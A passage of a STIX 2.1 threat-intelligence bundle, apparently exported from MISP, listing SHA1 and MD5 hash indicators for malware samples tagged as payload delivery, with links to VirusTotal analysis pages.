"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db82be-e58c-4bc9-8f93-4eba02de0b81",
|
|
"value": "https://www.virustotal.com/file/871cefc4f9faf8658804dbe8332e3b511172ea29545e13c303ae1809edf8a0f6/analysis/1475975633/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82be-3c20-4e00-abdb-453402de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:42.000Z",
|
|
"modified": "2017-03-29T09:47:42.000Z",
|
|
"description": "Associated samples - Xchecked via VT: 0a5c9818aa579082af224abc02dad60d77f4ded6533d143100b7744b58e289a2",
|
|
"pattern": "[file:hashes.SHA1 = '6c3e59bc1c53e200003b8edbcd2b9caf7740721d']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:47:42Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82bf-c180-40cf-82ae-477a02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:43.000Z",
|
|
"modified": "2017-03-29T09:47:43.000Z",
|
|
"description": "Associated samples - Xchecked via VT: 0a5c9818aa579082af224abc02dad60d77f4ded6533d143100b7744b58e289a2",
|
|
"pattern": "[file:hashes.MD5 = 'efec212b9c4ae4796078c742d386d1b6']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:47:43Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db82c0-b80c-4d26-b228-48ec02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:44.000Z",
|
|
"modified": "2017-03-29T09:47:44.000Z",
|
|
"first_observed": "2017-03-29T09:47:44Z",
|
|
"last_observed": "2017-03-29T09:47:44Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db82c0-b80c-4d26-b228-48ec02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db82c0-b80c-4d26-b228-48ec02de0b81",
|
|
"value": "https://www.virustotal.com/file/0a5c9818aa579082af224abc02dad60d77f4ded6533d143100b7744b58e289a2/analysis/1440061213/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82c1-b12c-41bf-82ea-4df802de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:45.000Z",
|
|
"modified": "2017-03-29T09:47:45.000Z",
|
|
"description": "Associated samples - Xchecked via VT: ba6022401ed257f82b7107319a7ec928044acd3dcb60dfab1ac7df2823ffef25",
|
|
"pattern": "[file:hashes.SHA1 = 'accef497a1c3c8bf63f40218c28d270157a10b47']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:47:45Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82c2-e960-4b9d-ab3e-4f0f02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:46.000Z",
|
|
"modified": "2017-03-29T09:47:46.000Z",
|
|
"description": "Associated samples - Xchecked via VT: ba6022401ed257f82b7107319a7ec928044acd3dcb60dfab1ac7df2823ffef25",
|
|
"pattern": "[file:hashes.MD5 = '519800e84fc8c2830bc3d35bd225a921']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:47:46Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db82c3-d08c-4d0e-8184-4cb202de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:47.000Z",
|
|
"modified": "2017-03-29T09:47:47.000Z",
|
|
"first_observed": "2017-03-29T09:47:47Z",
|
|
"last_observed": "2017-03-29T09:47:47Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db82c3-d08c-4d0e-8184-4cb202de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db82c3-d08c-4d0e-8184-4cb202de0b81",
|
|
"value": "https://www.virustotal.com/file/ba6022401ed257f82b7107319a7ec928044acd3dcb60dfab1ac7df2823ffef25/analysis/1439202396/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82c4-32b4-447b-92f0-422002de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:48.000Z",
|
|
"modified": "2017-03-29T09:47:48.000Z",
|
|
"description": "Associated samples - Xchecked via VT: 441b1db0595565ac059552790e96524851843b22787238291f286b16c9c951d4",
|
|
"pattern": "[file:hashes.SHA1 = '75dc42724490b41a09d19cd678b05c1adaf4ec37']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:47:48Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82c5-437c-4c56-8f05-427c02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:49.000Z",
|
|
"modified": "2017-03-29T09:47:49.000Z",
|
|
"description": "Associated samples - Xchecked via VT: 441b1db0595565ac059552790e96524851843b22787238291f286b16c9c951d4",
|
|
"pattern": "[file:hashes.MD5 = 'e3566ee82ad93b0b478cdfea20e293ca']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:47:49Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db82c6-c07c-4b2c-bc55-4a7202de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:50.000Z",
|
|
"modified": "2017-03-29T09:47:50.000Z",
|
|
"first_observed": "2017-03-29T09:47:50Z",
|
|
"last_observed": "2017-03-29T09:47:50Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db82c6-c07c-4b2c-bc55-4a7202de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db82c6-c07c-4b2c-bc55-4a7202de0b81",
|
|
"value": "https://www.virustotal.com/file/441b1db0595565ac059552790e96524851843b22787238291f286b16c9c951d4/analysis/1444917296/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82c6-a2a8-416a-b804-4c1c02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:50.000Z",
|
|
"modified": "2017-03-29T09:47:50.000Z",
|
|
"description": "Associated samples - Xchecked via VT: 824b93c4662cdc072488cf82d34569dd27d6f1fced5cb83f045825ed2e4b463c",
|
|
"pattern": "[file:hashes.SHA1 = '963f7435a560e175c1deb496c720d93b06031bd3']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:47:50Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82c7-d258-482b-bfdd-445f02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:51.000Z",
|
|
"modified": "2017-03-29T09:47:51.000Z",
|
|
"description": "Associated samples - Xchecked via VT: 824b93c4662cdc072488cf82d34569dd27d6f1fced5cb83f045825ed2e4b463c",
|
|
"pattern": "[file:hashes.MD5 = '901c332745b2f2a2364960ae56cbeed8']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:47:51Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db82c8-8e04-41fd-a2c2-4d8102de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:52.000Z",
|
|
"modified": "2017-03-29T09:47:52.000Z",
|
|
"first_observed": "2017-03-29T09:47:52Z",
|
|
"last_observed": "2017-03-29T09:47:52Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db82c8-8e04-41fd-a2c2-4d8102de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db82c8-8e04-41fd-a2c2-4d8102de0b81",
|
|
"value": "https://www.virustotal.com/file/824b93c4662cdc072488cf82d34569dd27d6f1fced5cb83f045825ed2e4b463c/analysis/1455262774/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82c9-a054-4b25-96ad-4e7602de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:53.000Z",
|
|
"modified": "2017-03-29T09:47:53.000Z",
|
|
"description": "Associated samples - Xchecked via VT: 5f45450f3342fd4f7f08651d58f775d47a25a44758039a577811eed6c094dfa7",
|
|
"pattern": "[file:hashes.SHA1 = 'a714dcec77dc6b54eaba69dd544f44bdcb51025e']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:47:53Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82ca-038c-4db0-80b4-4c1d02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:54.000Z",
|
|
"modified": "2017-03-29T09:47:54.000Z",
|
|
"description": "Associated samples - Xchecked via VT: 5f45450f3342fd4f7f08651d58f775d47a25a44758039a577811eed6c094dfa7",
|
|
"pattern": "[file:hashes.MD5 = 'ccff4f6893ad88adf999eaf862047208']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:47:54Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db82cb-8bc4-4ff1-aad5-452202de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:55.000Z",
|
|
"modified": "2017-03-29T09:47:55.000Z",
|
|
"first_observed": "2017-03-29T09:47:55Z",
|
|
"last_observed": "2017-03-29T09:47:55Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db82cb-8bc4-4ff1-aad5-452202de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db82cb-8bc4-4ff1-aad5-452202de0b81",
|
|
"value": "https://www.virustotal.com/file/5f45450f3342fd4f7f08651d58f775d47a25a44758039a577811eed6c094dfa7/analysis/1455263109/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82cc-efe8-4937-9a2f-49b802de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:56.000Z",
|
|
"modified": "2017-03-29T09:47:56.000Z",
|
|
"description": "Associated samples - Xchecked via VT: 9f2367e31987327ef5710f7dcbfa089382c1967247c5ac1e2342e1e10e495fb5",
|
|
"pattern": "[file:hashes.SHA1 = '321831f4a20c098ef08c46e56bca08e397d2d0af']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:47:56Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82cd-0ac8-4395-87d9-488102de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:57.000Z",
|
|
"modified": "2017-03-29T09:47:57.000Z",
|
|
"description": "Associated samples - Xchecked via VT: 9f2367e31987327ef5710f7dcbfa089382c1967247c5ac1e2342e1e10e495fb5",
|
|
"pattern": "[file:hashes.MD5 = '8a7d4ebc3b8dcfae38fe134f7f4a26c7']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:47:57Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db82ce-b4f0-4d26-9f88-430b02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:58.000Z",
|
|
"modified": "2017-03-29T09:47:58.000Z",
|
|
"first_observed": "2017-03-29T09:47:58Z",
|
|
"last_observed": "2017-03-29T09:47:58Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db82ce-b4f0-4d26-9f88-430b02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db82ce-b4f0-4d26-9f88-430b02de0b81",
|
|
"value": "https://www.virustotal.com/file/9f2367e31987327ef5710f7dcbfa089382c1967247c5ac1e2342e1e10e495fb5/analysis/1447357184/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82ce-08cc-40da-9f53-4fcd02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:58.000Z",
|
|
"modified": "2017-03-29T09:47:58.000Z",
|
|
"description": "Associated samples - Xchecked via VT: d884ae7b4f88973d2fb763b00c41171353310696e66dcde5733558ca68cd68d5",
|
|
"pattern": "[file:hashes.SHA1 = '629298c2e1b8a5affae7ba1b5629d18969c3c678']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:47:58Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82cf-71bc-4424-bba5-42aa02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:59.000Z",
|
|
"modified": "2017-03-29T09:47:59.000Z",
|
|
"description": "Associated samples - Xchecked via VT: d884ae7b4f88973d2fb763b00c41171353310696e66dcde5733558ca68cd68d5",
|
|
"pattern": "[file:hashes.MD5 = '1977efa4d9194d7179a5fe45efbd4bb5']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:47:59Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db82d0-dcb0-4e9d-90fb-43b602de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:48:00.000Z",
|
|
"modified": "2017-03-29T09:48:00.000Z",
|
|
"first_observed": "2017-03-29T09:48:00Z",
|
|
"last_observed": "2017-03-29T09:48:00Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db82d0-dcb0-4e9d-90fb-43b602de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db82d0-dcb0-4e9d-90fb-43b602de0b81",
|
|
"value": "https://www.virustotal.com/file/d884ae7b4f88973d2fb763b00c41171353310696e66dcde5733558ca68cd68d5/analysis/1476077638/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82d1-ba44-4fdc-af31-4c2002de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:48:01.000Z",
|
|
"modified": "2017-03-29T09:48:01.000Z",
|
|
"description": "Associated samples - Xchecked via VT: 071d91e67c42811d96d15a4a6dff740cc5d704ca352d9bc03778a2a6abd552f4",
|
|
"pattern": "[file:hashes.SHA1 = '7c21aeb7d002e0452881db8b375fce929260e151']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:48:01Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82d2-a644-422a-bf0a-404602de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:48:02.000Z",
|
|
"modified": "2017-03-29T09:48:02.000Z",
|
|
"description": "Associated samples - Xchecked via VT: 071d91e67c42811d96d15a4a6dff740cc5d704ca352d9bc03778a2a6abd552f4",
|
|
"pattern": "[file:hashes.MD5 = '3a45ab4dc15d31d0c52c3281bbc6fe32']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:48:02Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db82d3-afd8-4c2a-98ef-458702de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:48:03.000Z",
|
|
"modified": "2017-03-29T09:48:03.000Z",
|
|
"first_observed": "2017-03-29T09:48:03Z",
|
|
"last_observed": "2017-03-29T09:48:03Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db82d3-afd8-4c2a-98ef-458702de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db82d3-afd8-4c2a-98ef-458702de0b81",
|
|
"value": "https://www.virustotal.com/file/071d91e67c42811d96d15a4a6dff740cc5d704ca352d9bc03778a2a6abd552f4/analysis/1445897052/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82d4-1f98-40f0-b430-4ec802de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:48:04.000Z",
|
|
"modified": "2017-03-29T09:48:04.000Z",
|
|
"description": "Associated samples - Xchecked via VT: 7c4c2c898f611fd12a244822f5a2080da51126713d4ed1b3c950aa0ba6f92d93",
|
|
"pattern": "[file:hashes.SHA1 = '86a80bf7a42264f633e7e356dfea3e086534a9af']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:48:04Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82d5-56e8-49aa-9ac0-444c02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:48:05.000Z",
|
|
"modified": "2017-03-29T09:48:05.000Z",
|
|
"description": "Associated samples - Xchecked via VT: 7c4c2c898f611fd12a244822f5a2080da51126713d4ed1b3c950aa0ba6f92d93",
|
|
"pattern": "[file:hashes.MD5 = 'b8775e2fe8a67df00f61872848187470']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:48:05Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db82d6-f670-4ba6-bb0e-47e702de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:48:06.000Z",
|
|
"modified": "2017-03-29T09:48:06.000Z",
|
|
"first_observed": "2017-03-29T09:48:06Z",
|
|
"last_observed": "2017-03-29T09:48:06Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db82d6-f670-4ba6-bb0e-47e702de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db82d6-f670-4ba6-bb0e-47e702de0b81",
|
|
"value": "https://www.virustotal.com/file/7c4c2c898f611fd12a244822f5a2080da51126713d4ed1b3c950aa0ba6f92d93/analysis/1440688408/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82d6-75e4-41ac-8dcf-4bd502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:48:06.000Z",
|
|
"modified": "2017-03-29T09:48:06.000Z",
|
|
"description": "Associated samples - Xchecked via VT: 67a1dead18afc43c69a97de3e39bd84dec91df751a45bbda7ac5874f746c147c",
|
|
"pattern": "[file:hashes.SHA1 = '858d0d1eac0dc613b561d6b5f79031ec1ee5eb75']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:48:06Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82d7-479c-41cd-a4cd-4d8b02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:48:07.000Z",
|
|
"modified": "2017-03-29T09:48:07.000Z",
|
|
"description": "Associated samples - Xchecked via VT: 67a1dead18afc43c69a97de3e39bd84dec91df751a45bbda7ac5874f746c147c",
|
|
"pattern": "[file:hashes.MD5 = '2057895d8970cdb17934e3f31ee81278']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:48:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db82d8-0aa0-4f68-88ee-45d602de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:48:08.000Z",
|
|
"modified": "2017-03-29T09:48:08.000Z",
|
|
"first_observed": "2017-03-29T09:48:08Z",
|
|
"last_observed": "2017-03-29T09:48:08Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
